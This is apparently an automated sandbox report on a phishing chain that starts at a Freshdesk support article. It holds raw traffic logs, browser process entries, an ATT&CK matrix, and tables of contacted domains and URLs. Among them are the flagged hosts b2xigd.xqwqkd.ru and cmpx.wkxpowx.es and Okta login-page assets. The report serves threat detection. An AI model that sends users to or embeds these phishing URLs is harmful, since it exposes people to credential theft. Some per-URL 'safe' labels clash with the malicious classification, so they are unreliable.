              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownHTTPS traffic detected: 54.163.169.242:443 -> 192.168.2.16:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 54.163.169.242:443 -> 192.168.2.16:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.217.205.128:443 -> 192.168.2.16:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.72.189.255:443 -> 192.168.2.16:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.217.205.128:443 -> 192.168.2.16:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.217.205.128:443 -> 192.168.2.16:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.222.225.5:443 -> 192.168.2.16:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.181.227:443 -> 192.168.2.16:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.184.227:443 -> 192.168.2.16:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.36:443 -> 192.168.2.16:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.58.72:443 -> 192.168.2.16:49766 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.16:49769 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49770 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49771 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49773 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49774 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49776 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49778 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.122:443 -> 192.168.2.16:49784 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49785 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.16:49786 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49788 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.16:49798 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.187.96:443 -> 192.168.2.16:49800 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.187.96:443 -> 192.168.2.16:49801 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.187.96:443 -> 192.168.2.16:49799 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.16:49802 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.187.96:443 -> 192.168.2.16:49809 version: TLS 1.2
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6188_187405356
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6188_187405356
              Source: classification engineClassification label: mal96.phis.evad.win@24/44@83/289
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2104,i,4514877472533986594,3070483156680054246,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2124 /prefetch:3
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://enervit.freshdesk.com/en/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2104,i,4514877472533986594,3070483156680054246,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2124 /prefetch:3
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: Window RecorderWindow detected: More than 3 window changes detected

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 1.25.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.34..script.csv, type: HTML
              Source: Yara matchFile source: 2.35..script.csv, type: HTML
              Source: Yara matchFile source: 2.10.pages.csv, type: HTML
              Source: Yara matchFile source: 2.9.pages.csv, type: HTML
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              1
              Drive-by Compromise
              Windows Management Instrumentation1
              Scripting
              1
              Process Injection
              1
              Masquerading
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Extra Window Memory Injection
              1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information
              Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              File Deletion
              NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
              Ingress Tool Transfer
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Extra Window Memory Injection
              LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              https://enervit.freshdesk.com/en/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A00%Avira URL Cloudsafe
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://enervit.freshdesk.com/assets/cdn/portal/scripts/bottom.js0%Avira URL Cloudsafe
              https://enervit.freshdesk.com/assets/cdn/portal/scripts/integrations.js0%Avira URL Cloudsafe
              https://s3.amazonaws.com/cdn.freshdesk.com/data/helpdesk/attachments/production/156003954540/original/PTiHt9qRb1C4TyB5En3ZG-X76H6VeEpmhw.png?17420866310%Avira URL Cloudsafe
              https://enervit.freshdesk.com/assets/cdn/portal/scripts/head.js0%Avira URL Cloudsafe
              https://enervit.freshdesk.com/assets/cdn/portal/scripts/single-solution.js0%Avira URL Cloudsafe
              https://enervit.freshdesk.com/assets/cdn/portal/styles/theme.css0%Avira URL Cloudsafe
              https://enervit.freshdesk.com/assets/cdn/portal/scripts/preview-interactions.js0%Avira URL Cloudsafe
              https://enervit.freshdesk.com/assets/cdn/portal/scripts/locales/en.js0%Avira URL Cloudsafe
              https://enervit.freshdesk.com/assets/cdn/portal/images/no-results.png0%Avira URL Cloudsafe
              https://www.recaptcha.net/recaptcha/enterprise/bframe?hl=en&v=J79K9xgfxwT6Syzx-UyWdD89&k=6LdvejUUAAAAAEn6wjOFcPVRyQr4KtAJ03ltA1SQ0%Avira URL Cloudsafe
              https://www.recaptcha.net/recaptcha/enterprise/webworker.js?hl=en&v=J79K9xgfxwT6Syzx-UyWdD890%Avira URL Cloudsafe
              https://s3.amazonaws.com/cdn.freshdesk.com/data/helpdesk/attachments/production/156003954543/original/gKEuNY8F__FVOfN6eenNQVYZU1_NS71WOg.gif?17420866860%Avira URL Cloudsafe
              https://enervit.freshdesk.com/assets/misc/favicon.ico?7020170%Avira URL Cloudsafe
              https://enervit.freshdesk.com/assets/cdn/portal/vendor.js0%Avira URL Cloudsafe
              https://assets1.freshdesk.com/fonts/icomoon.ttf?aysp4f0%Avira URL Cloudsafe
              https://www.recaptcha.net/recaptcha/enterprise/anchor?ar=1&k=6LdvejUUAAAAAEn6wjOFcPVRyQr4KtAJ03ltA1SQ&co=aHR0cHM6Ly9lbmVydml0LmZyZXNoZGVzay5jb206NDQz&hl=en&v=J79K9xgfxwT6Syzx-UyWdD89&theme=light&size=normal&cb=948lpdq12c8i0%Avira URL Cloudsafe
              https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0/hit0%Avira URL Cloudsafe
              https://enervit.freshdesk.com/support/recaptcha0%Avira URL Cloudsafe
              https://enervit.freshdesk.com/assets/cdn/portal/scripts/marketplace.js0%Avira URL Cloudsafe
              https://enervit.freshdesk.com/assets/misc/logo.png0%Avira URL Cloudsafe
              https://b2xigd.xqwqkd.ru/tatay$wkg3t0%Avira URL Cloudsafe
              https://a.nel.cloudflare.com/report/v4?s=GIRTnAzUOM8w9h5YUnEmjpTU2UnAFdbPMd0Lz0kEDQxHV1ACzqaFkBCxC4O63Y2BRH1XqgvyaqSwesbAaf6TNCV%2F4q6EiAbhwRz8orNu8yDlkN7thpN5%2BXckXC0V0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              beacons3.gvt2.com
              216.58.212.163
              truefalse
                high
                a.nel.cloudflare.com
                35.190.80.1
                truefalse
                  high
                  developers.cloudflare.com
                  104.16.2.189
                  truefalse
                    high
                    enervit.freshdesk.com
                    54.163.169.242
                    truefalse
                      unknown
                      beacons-handoff.gcp.gvt2.com
                      142.251.143.35
                      truefalse
                        high
                        github.com
                        140.82.121.4
                        truefalse
                          high
                          www.recaptcha.net
                          142.250.181.227
                          truefalse
                            high
                            beacons2.gvt2.com
                            142.250.66.227
                            truefalse
                              high
                              assets1.freshdesk.com
                              52.222.225.5
                              truefalse
                                high
                                beacons.gvt2.com
                                142.251.143.35
                                truefalse
                                  high
                                  beacons6.gvt2.com
                                  142.250.185.227
                                  truefalse
                                    high
                                    s3.amazonaws.com
                                    52.217.205.128
                                    truefalse
                                      high
                                      code.jquery.com
                                      151.101.66.137
                                      truefalse
                                        high
                                        cdnjs.cloudflare.com
                                        104.17.24.14
                                        truefalse
                                          high
                                          challenges.cloudflare.com
                                          104.18.95.41
                                          truefalse
                                            high
                                            cmpx.wkxpowx.es
                                            104.21.58.72
                                            truetrue
                                              unknown
                                              www.google.com
                                              142.250.186.36
                                              truefalse
                                                high
                                                d19d360lklgih4.cloudfront.net
                                                13.33.187.96
                                                truefalse
                                                  high
                                                  beacons4.gvt2.com
                                                  216.239.32.116
                                                  truefalse
                                                    high
                                                    objects.githubusercontent.com
                                                    185.199.109.133
                                                    truefalse
                                                      high
                                                      b2xigd.xqwqkd.ru
                                                      104.21.32.1
                                                      truefalse
                                                        unknown
                                                        beacons.gcp.gvt2.com
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          ok4static.oktacdn.com
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            NameMaliciousAntivirus DetectionReputation
                                                            https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7false
                                                              high
                                                              https://enervit.freshdesk.com/assets/cdn/portal/scripts/preview-interactions.jsfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0false
                                                                unknown
                                                                https://www.recaptcha.net/recaptcha/enterprise.jsfalse
                                                                  high
                                                                  https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                                    high
                                                                    https://enervit.freshdesk.com/assets/cdn/portal/images/no-results.pngfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                                      high
                                                                      https://enervit.freshdesk.com/assets/cdn/portal/scripts/locales/en.jsfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://s3.amazonaws.com/cdn.freshdesk.com/data/helpdesk/attachments/production/156003954543/original/gKEuNY8F__FVOfN6eenNQVYZU1_NS71WOg.gif?1742086686false
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.cssfalse
                                                                        high
                                                                        https://b2xigd.xqwqkd.ru/tatay$wkg3tfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://enervit.freshdesk.com/assets/cdn/portal/vendor.jsfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                                                          high
                                                                          https://enervit.freshdesk.com/support/recaptchafalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://assets1.freshdesk.com/fonts/icomoon.ttf?aysp4ffalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://enervit.freshdesk.com/assets/cdn/portal/scripts/bottom.jsfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.cssfalse
                                                                            high
                                                                            https://enervit.freshdesk.com/assets/cdn/portal/styles/theme.cssfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://s3.amazonaws.com/cdn.freshdesk.com/data/helpdesk/attachments/production/156003954540/original/PTiHt9qRb1C4TyB5En3ZG-X76H6VeEpmhw.png?1742086631false
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://enervit.freshdesk.com/assets/cdn/portal/scripts/integrations.jsfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://enervit.freshdesk.com/assets/cdn/portal/scripts/head.jsfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.recaptcha.net/recaptcha/enterprise/bframe?hl=en&v=J79K9xgfxwT6Syzx-UyWdD89&k=6LdvejUUAAAAAEn6wjOFcPVRyQr4KtAJ03ltA1SQfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://enervit.freshdesk.com/assets/cdn/portal/scripts/single-solution.jsfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://developers.cloudflare.com/favicon.pngfalse
                                                                              high
                                                                              https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.jsfalse
                                                                                high
                                                                                https://www.recaptcha.net/recaptcha/enterprise/webworker.js?hl=en&v=J79K9xgfxwT6Syzx-UyWdD89false
